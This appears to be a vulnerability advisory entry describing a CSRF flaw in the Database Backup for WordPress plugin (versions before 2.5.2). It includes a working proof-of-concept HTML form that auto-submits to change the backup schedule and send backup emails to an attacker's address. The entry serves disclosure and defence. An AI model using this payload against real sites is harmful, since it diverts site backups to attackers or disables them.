Lucene search

K
wpexploitDaniel RufWPEX-ID:39388900-266D-4308-88E7-D40CA6BBE346
HistoryMay 11, 2022 - 12:00 a.m.

Database Backup for WordPress < 2.5.2 - Arbitrary Schedule Settings Update via CSRF

2022-05-1100:00:00
Daniel Ruf
80
wordpress
database backup
arbitrary schedule
csrf
exploit

EPSS

0.001

Percentile

32.1%

The plugin does not have CSRF check in place when updating the schedule backup settings, which could allow an attacker to make a logged in admin change them via a CSRF attack. This could lead to cases where attackers can send backup notification emails to themselves, which contain more details. Or disable the automatic backup schedule

<form id="test" action="https://example.com/wp-admin/tools.php?page=wp-db-backup#schedule" method="POST">
    <input type="text" name="wp_cron_schedule" value="daily">
    <input type="text" name="cron_backup_recipient" value="[email protected]">
    <input type="text" name="wp_cron_backup_options" value="SET">
</form>
<script>
    document.getElementById("test").submit();
</script>

EPSS

0.001

Percentile

32.1%

Related for WPEX-ID:39388900-266D-4308-88E7-D40CA6BBE346